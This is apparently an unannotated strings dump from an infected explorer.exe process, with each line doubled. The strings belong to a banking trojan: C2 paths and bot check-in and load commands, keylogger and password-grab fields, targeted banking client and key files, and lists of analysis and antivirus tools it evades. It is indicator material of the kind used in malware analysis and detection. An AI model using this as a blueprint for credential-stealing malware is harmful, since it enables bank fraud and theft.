Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
LOCALSERVICE!XP1!F9BE9A8A
LOCALSERVICE!XP1!F9BE9A8A
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.ffffff00
MSCTF.Shared.MUTEX.ffffff00
%Documents and Settings%\LocalService\Application Data\
%Documents and Settings%\LocalService\Application Data\
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
Explorer.EXE_1988_rwx_01E00000_0005B000:
.text
.text
`.data
`.data
.reloc
.reloc
`.rdata
`.rdata
@.data
@.data
http
http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
à %dh %dm
à %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
Explorer.EXE_1988_rwx_01E60000_0006A000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
http
http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
à %dh %dm
à %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
